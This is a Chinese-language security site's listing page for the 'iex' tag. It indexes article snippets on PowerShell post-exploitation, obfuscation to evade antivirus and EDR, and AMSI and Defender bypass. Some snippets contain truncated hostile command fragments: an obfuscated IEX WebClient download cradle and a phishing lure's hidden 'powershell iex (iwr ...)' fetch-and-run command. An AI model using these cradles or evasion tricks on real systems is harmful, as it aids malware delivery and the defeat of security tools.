iex | CN-SEC 中文网

安全文章

PowerShell：黑客后渗透中的利器与防御策略

嘿大家！如果您参与过红队测试、渗透测试，或者只是喜欢探索网络安全的进攻端，那么您的工具包里可能装满了 Metasploit、Cobalt Strike 等常用工具，或者一些自定义的 Python 脚本...

06月10日17 views评论

阅读全文

安全文章

免杀-绕过杀软检测新姿势！ArgFuscator利用命令行混淆绕过EDR/AV检测

点击上方蓝字关注【渗透测试】不迷路📌【前言】大家好！🤔你有没有想过，那些号称“坚不可摧”的杀毒软件和EDR系统，其实像是个脾气暴躁的保安——看谁都像坏人，但只要你会点“障眼法”，它连...

05月15日31 views已关闭评论

阅读全文

安全文章

红队实战 | PowerShell混淆绕过杀软

杀软检测机制绕过语法 set temp=IEX((((((`N""e^w`-""O""b^j^e""c^t ^N""e""T.""W`e""b""C`l^i`e""n""t))))))."D`own...

03月25日23 views评论

阅读全文

安全文章

记一次powershell的免杀之路（绕过360、火绒）

记一次powershell的免杀之路powershell简介 powershell是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能，PowerS...

12月28日17 views评论

阅读全文

安全新闻

黑客武器库 | AMSI.fail完美bypass AMSI

0-简介【OSCP必备】【OSEP必备】【实战必备】 amsi.fail是一款AMSI bypass神器 1-名称 https://amsi.fail/ 2-来源 https://github.co...

12月04日19 views评论

阅读全文

安全文章

红队 TTP 第一部分：AMSI 逃避

距离我上次写博文已经有一段时间了。我之前写了这篇文章的一部分，但后来我加入了 Mandiant/Fireeye，担任高级红队顾问，这段经历对我来说很坎坷，因为我一直忙于办公室项目以及我的红队和对手模拟...

12月01日12 views评论

阅读全文

安全文章

规避 MDATP 以实现全面终端入侵

介绍本文的目的是展示受 Microsoft EDR 解决方案 Windows Defender Advanced Threat for Endpoint 保护的最新 Windows 10 端点的全面入...

11月08日19 views评论

阅读全文

安全文章

【网络钓鱼】女神电脑沦陷记

女神电脑沦陷记通过邮件发送钓鱼信息访问提示连接不安全跳转验证机器人操作诱导你完成复制粘贴powershell.exe -w hidden -Command "iex (iwr '[https://]2...

09月24日32 views评论

阅读全文

安全百科

[网络安全] 四十六.Powershell和PowerSploit脚本攻防万字详解

前文分享了Windows基础，包括系统目录、服务、端口、注册表黑客常用的DOS命令及批处理powershell。这篇文章将详细讲解PowerShell和PowerSploit脚本攻击，进一步结合MSF...

03月22日62 views评论

阅读全文

安全文章

红队攻防之powershell上线基础免杀(一)

不努力，你背井离乡干嘛？当卧底啊环境为win10，在哥斯拉生成的webshell下，执行powershell命令。测试杀毒软件为：火绒，腾讯电脑管家哥斯拉生成php文件的webshell 如图 ...

02月25日58 views评论

阅读全文

加载 PowerShell 脚本

通过 Module, IEX, Metasploit, Cobalt Strike 方式加载 PowerShell 脚本 Module通过导入模块的方式加载 PowerShell 脚本. Import...

12月15日安全博客24 views评论

阅读全文

安全文章

powershell分离免杀的几种简单方式

免责声明本公众号“猎洞时刻”旨在分享网络安全领域的相关知识，仅限于学习和研究之用。本公众号并不鼓励或支持任何非法活动。本公众号中提供的所有内容都是基于作者的经验和知识，并仅代表作者个人的观点和意见。这...

11月28日74 views评论

阅读全文

PowerShell：黑客后渗透中的利器与防御策略

免杀-绕过杀软检测新姿势！ArgFuscator利用命令行混淆绕过EDR/AV检测

红队实战 | PowerShell混淆绕过杀软

记一次powershell的免杀之路（绕过360、火绒）

黑客武器库 | AMSI.fail完美bypass AMSI

红队 TTP 第一部分：AMSI 逃避

规避 MDATP 以实现全面终端入侵

【网络钓鱼】女神电脑沦陷记

[网络安全] 四十六.Powershell和PowerSploit脚本攻防万字详解

红队攻防之powershell上线基础免杀(一)

加载 PowerShell 脚本

powershell分离免杀的几种简单方式

在线咨询

微信